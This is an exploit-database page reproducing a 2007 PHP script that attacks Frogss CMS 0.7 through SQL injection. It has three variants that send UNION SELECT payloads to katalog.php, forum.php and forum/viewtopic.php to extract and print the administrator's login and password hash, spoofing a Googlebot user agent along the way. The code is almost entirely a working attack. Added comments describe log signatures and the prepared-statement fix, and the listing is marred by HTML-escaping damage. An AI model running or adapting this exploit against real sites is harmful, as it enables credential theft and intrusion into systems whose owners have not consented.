
Frogss CMS 0.7 Remote SQL Injection Exploit

🗓️ 15 Apr 2007 00:00:00 · Reported by RootType
Source: seebug (www.seebug.org)

Frogss CMS 0.7 Remote SQL Injection Exploit

Code

                                                <?
print&nbsp;(\"Autor:&nbsp;Kacper
Contact:&nbsp;[email protected]
Homepage:&nbsp;http://www.rahim.webd.pl/
Irc:&nbsp;irc.milw0rm.com:6667&nbsp;#devilteam&nbsp;

Pozdro&nbsp;dla&nbsp;wszystkich&nbsp;z&nbsp;kanalu&nbsp;IRC&nbsp;oraz&nbsp;forum&nbsp;DEVIL&nbsp;TEAM.

Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit
script&nbsp;homepage:&nbsp;http://frogss.com/


\");
if&nbsp;($argc<4)&nbsp;{
print_r(\'
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage:&nbsp;php&nbsp;\'.$argv[0].\'&nbsp;host&nbsp;path&nbsp;Vulnerabilities_number&nbsp;OPTIONS
host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname)
path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frogss&nbsp;path
Vulnerabilities&nbsp;number:&nbsp;1&nbsp;or&nbsp;2&nbsp;or&nbsp;3
Options:
&nbsp;-p[port]:&nbsp;&nbsp;&nbsp;&nbsp;specify&nbsp;a&nbsp;port&nbsp;other&nbsp;than&nbsp;80
&nbsp;-P[ip:port]:&nbsp;specify&nbsp;a&nbsp;proxy
Example:
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;1
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;2
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;3
php&nbsp;\'.$argv[0].\'&nbsp;127.0.0.1&nbsp;/frogss/&nbsp;1&nbsp;-P1.1.1.1:80
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
\');
die;
}
error_reporting(7);
ini_set(\"max_execution_time\",0);
ini_set(\"default_socket_timeout\",5);

/**
 * Debug helper: renders $string as a hex view followed by a printable-character view.
 *
 * Every byte adds a space plus its two-digit hex value to the hex view, and two
 * spaces plus the character itself (or "." when the byte is <= 32 or > 126) to
 * the text view. After every 15 bytes a line break is appended to both views.
 * The function is not called anywhere in the visible listing.
 *
 * @param string $string raw bytes to render
 * @return string the hex view, a line break, then the text view
 */
function&nbsp;quick_dump($string)
{
&nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0;
&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++)
&nbsp;&nbsp;{
   // "|" is a bitwise OR applied to two boolean comparisons; the truth value is the same as "||" here.
&nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;))
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];}
   // Left-pad single-digit hex values with "0" so every byte occupies two hex digits.
&nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2)
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));}
   // $cont counts bytes on the current row; wrap both views after 15 bytes.
&nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\"
\";&nbsp;$exa.=\"
\";}
&nbsp;&nbsp;}
&nbsp;return&nbsp;$exa.\"
\".$result;
}
// Pattern that wyslijpakiet() applies to the -P option value, which the usage text describes as ip:port.
// NOTE(review): the listing is HTML-escaped, so the pattern may not be printed exactly as it was written.
$proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\';

/**
 * Writes a raw request to a socket and stores the whole response in the global $html.
 * ("wyslij pakiet" is Polish for "send packet".)
 *
 * With an empty $proxy the socket goes straight to $host:$port; otherwise $proxy
 * is checked against $proxy_regex and the socket goes to that proxy instead.
 * The script terminates (die) when a connection fails or the proxy value is rejected.
 *
 * @param string $packet complete request text, written to the socket unchanged
 * @return void the response is left in the global $html
 */
function&nbsp;wyslijpakiet($packet)
{
&nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex;
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
    // Direct connection: the host name is resolved with gethostbyname() before connecting.
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
	$c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die;
&nbsp;&nbsp;&nbsp;&nbsp;}
    // Split "ip:port"; the port part is cast to an integer.
&nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;$parts[1]=(int)$parts[1];
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die;
	}
&nbsp;&nbsp;}
&nbsp;&nbsp;fputs($ock,$packet);
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
    // Direct connection: read line by line until the peer closes the socket.
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
    // Proxy connection: read one byte at a time. The two conditions are joined with "or",
    // so the loop ends only once EOF is reached AND a CR LF CR LF sequence is present in $html.
    // eregi() was deprecated in PHP 5.3 and removed in PHP 7.0, which dates this listing.
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;fclose($ock);
}

// Positional arguments: target host, installation path, and which of the three variants to run.
$host=$argv[1];
$path=$argv[2];
$action=$argv[3];
// Defaults: port 80, no proxy.
$port=80;
$proxy=\"\";
// Option scan starts at index 3, i.e. it also inspects the vulnerability number itself.
// $argv[$i][1] reads the second character; a one-character argument such as "1" has no such offset.
for&nbsp;($i=3;&nbsp;$i<$argc;&nbsp;$i++){
$temp=$argv[$i][0].$argv[$i][1];
// -p<port>: the remainder of the argument is cast to an integer.
if&nbsp;($temp==\"-p\")
{
&nbsp;&nbsp;$port=(int)str_replace(\"-p\",\"\",$argv[$i]);
}
// -P<ip:port>: kept as a string; it is validated later, when the request is sent.
if&nbsp;($temp==\"-P\")
{
&nbsp;&nbsp;$proxy=str_replace(\"-P\",\"\",$argv[$i]);
}
}
// The path must both start and end with "/".
if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{die(\"Bad&nbsp;path!\");}
// Through a proxy the request line carries the absolute URL instead of the bare path.
if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;}
// An unknown variant number only prints this message; the script does not exit here.
if&nbsp;(($action!=1)&nbsp;and&nbsp;($action!=2)&nbsp;and&nbsp;($action!=3))&nbsp;{echo&nbsp;\"select&nbsp;Vulnerabilities&nbsp;number&nbsp;(1,2,3)&nbsp;...\";}
/**
 * Encodes a string as a SQL CHAR(...) expression listing the decimal code of each
 * byte, so the resulting text contains no quote characters.
 *
 * With the two marker strings used in this listing, "<!--[" becomes
 * CHAR(60,33,45,45,91) and "]-->" becomes CHAR(93,45,45,62).
 * Detection: either sequence in the query string of a logged request is a
 * signature of this script.
 *
 * An empty string yields "CHAR(" without a closing parenthesis, because the ")"
 * is appended only inside the loop.
 *
 * @param string $my_string text to encode
 * @return string the CHAR(...) expression
 */
function&nbsp;char_convert($my_string)
{
&nbsp;&nbsp;$encoded=\"CHAR(\";
&nbsp;&nbsp;for&nbsp;($k=0;&nbsp;$k<=strlen($my_string)-1;&nbsp;$k++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$encoded.=ord($my_string[$k]);
    // Close the expression after the last byte; separate all others with a comma.
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($k==strlen($my_string)-1)&nbsp;{$encoded.=\")\";}
&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;{$encoded.=\",\";}
&nbsp;&nbsp;}
&nbsp;&nbsp;return&nbsp;$encoded;
}
// Three variants of the same flaw: a request parameter reaches a SQL query unsanitised, so a
// UNION SELECT appended to it reads the login and haslo ("password") columns of the uzytkownicy
// ("users") table for rows with poziom ("level") = 0.
//   1: katalog.php, parameter dzial (the value is followed by a single quote)
//   2: forum.php, parameter t (numeric context, no quote)
//   3: forum/viewtopic.php, parameter t (numeric context, no quote)
// Each variant sends two requests that differ only in the column read, and cuts the value out of
// the response between the "<!--[" and "]-->" markers.
// Detection in web logs: "-99999999" followed by "/**/UNION/**/SELECT/**/" in dzial or t,
// User-Agent "Googlebot/2.1", "Accept-Language: pl", HTTP/1.0 request line.
// Remediation on the application side: bind these parameters in prepared statements (or cast
// the numeric ones to integers) instead of concatenating them into the query.
if&nbsp;($action==1)
{
print&nbsp;\"+++++++++++++++++++++++++++++++++++++++++++++++++
\";
print&nbsp;\"Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper
\";
print&nbsp;\"Vulnerabilities&nbsp;Number:&nbsp;1
\";
// Request 1 of variant 1: reads the haslo column through katalog.php?dzial=.
$packet&nbsp;=\"GET&nbsp;\".$p.\"katalog.php?dzial=-99999999\'/**/UNION/**/SELECT/**/0,CONCAT(\".char_convert(\"<!--[\").\",haslo,\".char_convert(\"]-->\").\")/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"katalog.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
// If the markers are absent from the response, $t[1] does not exist and an empty value is printed.
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$pass=$t2[0];
echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$pass.\"
\";
// Request 2 of variant 1: same request, reading the login column.
$packet&nbsp;=\"GET&nbsp;\".$p.\"katalog.php?dzial=-99999999\'/**/UNION/**/SELECT/**/0,CONCAT(\".char_convert(\"<!--[\").\",login,\".char_convert(\"]-->\").\")/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"katalog.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$login=$t2[0];
echo&nbsp;\"Admin&nbsp;Login:&nbsp;\".$login.\"
\";
}
elseif&nbsp;($action==2)
{
print&nbsp;\"+++++++++++++++++++++++++++++++++++++++++++++++++
\";
print&nbsp;\"Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper
\";
print&nbsp;\"Vulnerabilities&nbsp;Number:&nbsp;2
\";
// Request 1 of variant 2: reads the haslo column through forum.php?d=1&t=.
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum.php?d=1&t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",haslo,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$pass=$t2[0];
echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$pass.\"
\";
// Request 2 of variant 2: same request, reading the login column.
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum.php?d=1&t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",login,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$login=$t2[0];
echo&nbsp;\"Admin&nbsp;Login:&nbsp;\".$login.\"
\";
}
elseif&nbsp;($action==3)
{
print&nbsp;\"+++++++++++++++++++++++++++++++++++++++++++++++++
\";
print&nbsp;\"Frogss&nbsp;CMS&nbsp;<=&nbsp;0.7&nbsp;SQL&nbsp;Injection&nbsp;Exploit&nbsp;by&nbsp;Kacper
\";
print&nbsp;\"Vulnerabilities&nbsp;Number:&nbsp;3
\";
// Request 1 of variant 3: reads the haslo column through forum/viewtopic.php?t=.
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",haslo,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum/viewtopic.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$pass=$t2[0];
echo&nbsp;\"Admin&nbsp;Password:&nbsp;\".$pass.\"
\";
// Request 2 of variant 3: same request, reading the login column.
$packet&nbsp;=\"GET&nbsp;\".$p.\"forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(\".char_convert(\"<!--[\").\",login,\".char_convert(\"]-->\").\"),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/*&nbsp;HTTP/1.0
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"forum/viewtopic.php
\";
$packet.=\"Accept-Language:&nbsp;pl
\";
$packet.=\"User-Agent:&nbsp;Googlebot/2.1
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close

\";
wyslijpakiet($packet);
sleep(3);
$t=explode(\"<!--[\",$html);
$t2=explode(\"]-->\",$t[1]);
$login=$t2[0];
echo&nbsp;\"Admin&nbsp;Login:&nbsp;\".$login.\"
\";
}
?>


15 Apr 2007 00:00 (current)
Vulners AI Score: 7.1 (High risk)